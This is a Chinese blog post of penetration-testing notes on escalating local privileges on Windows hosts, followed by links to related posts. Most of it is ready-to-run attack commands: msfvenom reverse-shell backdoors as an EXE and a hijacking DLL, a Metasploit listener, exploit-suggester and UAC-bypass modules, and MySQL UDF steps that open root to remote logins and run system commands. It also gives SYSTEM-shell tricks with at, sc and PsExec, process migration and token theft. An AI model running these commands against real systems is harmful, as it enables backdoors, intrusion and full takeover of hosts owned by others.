windows内网本地用户提权

已于 2024-04-09 18:46:33 修改
阅读量621 收藏 4
点赞数 3
文章标签: windows
于 2024-04-09 17:21:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_49714982/article/details/136881142
版权

一、溢出漏洞提权

前提:

1.有当前计算机的web权限,建立在web权限取得的情况下进行的权限提升

2.符合的操作系统

3.符合的溢出漏洞

提权辅助网页 Windows提权辅助 (hacking8.com)

步骤:

1.信息收集-操作系统版本 漏洞补丁 计算机位数 杀软 网络 当前权限 等

2.基于补丁和位数以及系统版本筛选溢出漏洞EXP(CS/MSF/手工)

3.上传EXP调用执行去提权

MSF步骤:

1.生成后门
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.1.130 LPORT=4444 -f exe -o msf.exe  
2.配置监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.1.1.130
set lport 4444
run
3.信息收集
getuid
..
4.msf筛选使用模块
use post/windows/gather/enum_pathes   (半自动:根据漏洞编号找出系统安装的补丁)
use post/multi/recon/local_exploit_suggester   (全自动:快速识别系统中可能被利用的漏洞)
set showdescription true
set session 1  (看你session为几)
5.使用筛选出的模块进行提权
use xxxxx/xxxx/xxx
show options (查看必须需要填写的参数)
set xxx xxxx
..
run

二、数据库提权

mysql提权:

前提:

1.有数据库的最高权限用户的密码(sql注入,数据库配置、备份文件,可远程连接的数据库爆破)

windows配置文件路径:

MySQL/data/mysql/user.MYD   或user.MYI
WWW/inc/conn.info.php

UDF提权:

获取密码->开启外联->高版本创建目录->MSF导出dll->Webshell执行后续

1.mysql<5.2  导出目录c:/windows或system32

2.mysql>=5.2  导出安装目录/lib/plugin/   安装目录获取:select @@basedir

开启外联:

use mysql;
update user set host = '%' where user = 'root';
或者
GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '获取到的root密码' WITH GRANT OPTION;

MSF导出dll:

msf:
use exploit/multi/mysql/mysql_udf_payload
set username root
set password 获取的root密码
set rhost ..
set rport ..
run

mysql:
select * from mysql.func where name="sys_exec";   #获取dll名字 
create function sys_eval returns string soname "udf.dll"';  #重新创建函数绑定获取的dll
select sys_eval('ipconfig');   #执行命令

sqlserver提权:

xp_cmdshell,sp_oacreate,沙箱提权

三、at提权

在windows 2008 以及 win7以前的版本可以使用at提权,前提拥有shell的桌面交互权限

at 20:00 /interactive cmd  #创建在20:00以system权限开启一个cmd窗口的计划任务

四、sc提权

在windows 2003中版本可以使用

#创建一个名叫sysycmd的新的交互式shell执行服务
sc Create syscmd binPath="cmd /K start" type=own type=interact
#运行服务
sc start syscmd

五、psexec提权

PsExec.exe -accepteula -s -i -d cmd #调用运行cmd

psexec下载使用:PsExec - Sysinternals | Microsoft Learn

六、进程迁移注入

msf上线
meterpreter->
ps   #查看属于NT AUTHORITY\SYSTEM的进程,找到想用的进程PID
migrate 5552 #进程迁移
getuid #查看uid 提权成功

七、令牌窃取

msf上线
meterpreter->
use incognito
list_tokens -u  #列出用户令牌
impersonate_token "NT AUTHORITY\SYSTEM"
getuid #查看uid 提权成功

MS16-075烂土豆提权是基于令牌窃取提权。其适用版本:Windows 781020082012 

msf上线
meterpreter->
getprivs   #获取主机拥有的特权名,如果有SeImpersonatePrivilege,则可以继续进行
use incognito
list_tokens -u
execute -cH -f c:\\wmpub\\potato.exe   
impersonate_token "NT AUTHORITY\\SYSTEM"

八、UAC绕过

UAC(UserAccount Control,用户账户控制)简言之就是在Vista及更高版本中通过弹框进一步让用户确认是否授权当前可执行文件来达到阻止恶意程序的目的。绕过前提:必须是在管理员组中

use exploit/windows/local/bypassuac_injection
set session 3
run

九、DLL劫持

Windows程序启动的时候需要DLL。如果这些DLL 不存在,则可以通过在应用程序要查找的位置放置恶意DLL来提权。通常,Windows应用程序有其预定义好的搜索DLL的路径,它会根据下面的顺序进行搜索:

1、应用程序加载的目录
2、C:\Windows\System32
3、C:\Windows\System
4、C:\Windows
5、当前工作目录Current Working Directory,CWD
6、在PATH环境变量的目录(先系统后用户)

1.收集进程加载的dll

2.使用msf生成篡改dll

3.替换dll

4.上线

【Windows提权】本地提权之dll劫持_dll劫持提权-CSDN博客

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.1.130 LPORT=4444 -f dll >./libssl-1_1.dll

login_upset
关注
SeImpersonatePrivilege权限提权(Server 2019)
墨痕诉清风的博客
04-23 1216
SeImpersonatePrivilege权限提权
Windows本地提权
ximo的博客
03-20 503
1.PsExec提权 PsExec -i -s cmd //-i 交互式 -s syetem权限 打开cmd窗口 2.at 方式提权(xp,2003) at 00:00 /interactive cmd 指定时间执行cmd,获得system权限。 操作系统中,who执行命令,命令就拥有who权限。 使用system打开任务管理器: taskmgr 结束explorer.exe(桌面进程,权限为管理员): 桌面图标消失,任务栏消失。 再打开一个桌面进程(文件,创建新任务): 权限为系
内网渗透常用提权方式总结
j1044957016的博客
06-01 7633
内网菜鸡艰难学习,希望一样的菜鸡能省去打开一堆链接的时间吧
windows下udf提权的知识点梳理
最新发布
wangqiao258的博客
07-10 274
1、知道网站物理路径2、高权限数据库用户(数据库的写)3、load_file () 开启 即 secure_file_priv 无限制4、网站路径有写入权限。
LINUX之内网渗透提权
weixin_34268753的博客
03-25 183
在渗透测试过程中,经常遇到如下情形,内部网络主机通过路由器或者安全设备做了访问控制,无法通过互联网直接访问本地开放的服务,Windows方 面,国内通常选择Lcx.exe来进行端口转发,在应用方面大多数人也会选择reDuh来进行端口转发,而linux却很少人用系统自带的ssh、iptables自身来处理此类问题。由于时间有限,本文只详细的介绍ssh tunnel方面的知识,iptables的有空再...
windows10提权
qq_54030686的博客
11-15 2639
即可查看到,这里目标是以Administartor权限测试,这里不进行验证,我都有Administartor了,我直接msf下面getsystem即可,getsystem实际上也是令牌窃取。里面共描述了服务路径,文件权限,计划任务,令牌窃取,图形化软件,应用组件安装等,这里只有令牌窃取需要管理员Administrator权限,值得注意的是该权限并不是管理员组中的其他用户。发现该文件以system权限运行,而我们拥有对该文件的修改权限,修改daclsve服务的具体执行文件,从而获取system权限。
Linux内网提权
qq_49714982的博客
03-29 716
查看sudo -l 如果 有 (root) NOPASSWD: /usr/bin/git 则可以提权。前提条件:/etc/sudoers 如果为当前权限可更改,则可进行写入普通用户sudo权限。前提条件:当前用户shell为普通用户且有可以利用的命令。普通用户可进行sudo 执行root权限命令。确定在rbash权限下:echo $PATH。(2)执行者对于该程序需要有x的可执行权限。确定可以使用的命令:compgen -c。(3)本权限仅在程序的执行过程中有效。(1)SUID仅对二进制有效。
内网渗透基石篇--权限提升(上)
m0_59598029的博客
08-22 550
本文主要从内网权限提升出发,主要介绍一些低权限用户如何通过一些工具和脚本来获取一些高权限。中间介绍了一些脚本和工具的使用,还做了几个实验来理解这些工具。通过网络共享可以访问到GPP的组策略的文件:[外链图片转存中…(img-p58R0UJr-1692624642993)]打开可以看到存储的cpasword密码:[外链图片转存中…(img-hgVbL7Vs-1692624642994)]六、 针对组策略首选项提取的防御措施1.设置共享文件夹SYSVOL的访问权限。
权限提升-Windows本地提权-AT+SC+PS命令-进程迁移-令牌窃取-getsystem+UAC
xiaoheizi的博客
08-30 1466
进程迁移注入提权就是将获取到权限低的进程注入至进程中权限高的中,这样就实现了权限提升,同时注入进程提权相当于开启了一个后门, 隐蔽性极高,不会创建新的进程,很难发现。操作数据库的权限,数据库的增删改等,源码或配置文件泄漏,也可能是网站权限(webshell)进行的数据库配置文件读取获得。原理:把我的进程注入到一个现有的system账号运行的进程中,这样我的进程也就具有了system账号的权限了。程序路径:Potato/source/Potato/Potato/bin/Release/Potato.exe。
108.网络安全渗透测试—[权限提升篇6]—[Windows内核溢出提权]
qwsn
07-04 2688
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! window 服务器常用的是win2003、win2008和win2012。在渗透测试中 ,我们获取的权限是iis_user用户组 ,要更高的权限就需要把当前的用户提权到系统用户或超级管理员用户组。更高的权限方便我们在后续的渗透中,扩大范围测试。 在iis里面,权限依次的大小对比:,aspx默认能执行终端命令、php和asp如果不能执行命令,在wscript.shell组件没有删除的情况下,可以上传c
系统提权之:Windows 提权
f_carey的博客
11-04 2765
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 Windows 提权1 利用漏洞提权1.1 手工查找系统缺失补丁1.2 Windows 补丁审计工具1.2.1 Windows-Exploit-Suggester1.2.2 Sherlock1.3 MSF 模块查找可利用漏洞2 利用 Windows 配置错误提权2.1 系统服务权限配置错误2.1.1 利用 Po.
解决win10提权问题,一键提权,方便
07-26
希望能帮助大家,大家可以试试,我就是这么解决的,很方便
windows提权漏洞
08-02
提权漏洞
内网提权--linux提权
hakksjss的博客
05-20 329
先枚举内核信息(得到那些漏洞可以用来提权)否则无法运行,会提示依赖库不存在等问题。注:尽量保证自己编辑代码的。
CVE-2021-1732_Windows本地提权漏洞
weixin_45715461的博客
06-30 2593
CVE-2021-1732_Windows本地提权漏洞
内网渗透-权限提升
qq_63980959的博客
04-05 1673
提高自己在服务器中的权限,主要针对网站入侵过程中,当入侵某一网站时,通过各种漏洞提升webshell权限以夺得该服务器权限提权,顾名思义就是提高自己在服务器中的权限 ,比如在windows中本身登录的用户时guest,然后通过提权后就变成超级管理员(adminstrator),拥有了管理windwos的所有权限在Windwos中,权限大概分为四种,分别是Users、Administrator、System、TrustedInstaller。
内网攻防-提权-Linux
h1nt的博客
08-17 1134
Linux提权一文通 前言 原文来自于https://www.freebuf.com/articles/251884.html 感觉很多都是机翻,还有些大大小小的格式问题 遂去外网找到原文重新翻译排版了一遍,同时也参考了原文的翻译 0x01 Linux提权描述 大多数计算机系统设计为可与多个用户一起使用。特权是指允许用户执行的操作。普通特权包括查看和编辑文件或修改系统文件。特权升级意味着用户获得他们无权获得的特权。这些特权可用于删除文件,查看私人信息或安装不需要的程序,例如病毒。通常,当系统存在允许
内网渗透(二)之提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
11-14 5876
对于内网渗透,到我们拿到了公网主机的权限后,并获得了一些本机的信息时。我们首先得知道我们的权限。如果获取到的是普通用户权限,则我们需要想办法提权至管理员权限。如果获得的已经是管理员权限,则可以忽略这一步。对于Windows系统,只有提权到管理员权限后,才可以运行mimikatz以及执行一些其他高权限的操作。对于Linux系统,很多命令需要root权限才能执行,只有提权到root权限才能执行后面的信息收集等工作。
48-4 内网渗透 - Rotten Potato(烂土豆) 提权
weixin_43263566的博客
06-21 452
在渗透测试中,Potato家族是一种常用的提权技术,主要利用Windows服务账户的特权来将已获取的权限提升至系统(SYSTEM)级别。具体而言,Potato家族的攻击方式是将已获得的NT AUTHORITY\SYSTEM账户的访问令牌传递给CreateProcessWithTokenW或CreateProcessAsUserA函数,从而在SYSTEM账户的上下文中启动新进程,从而实现权限提升。,这篇文章介绍的提权方式跟之前最大的优势就是可以通过。,上一篇文章介绍的只能在管理员权限的基础上提升。
内网安全攻防:UAC提权分析与防范
"这篇资料是关于内网安全攻防的分享,特别关注了Windows系统内的UAC(用户账户控制)绕过与提权技术。内容包括了对UAC的介绍,以及如何通过Runas模块和bypassuac模块进行提权的详细步骤,并提出了相应的防范措施。" ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值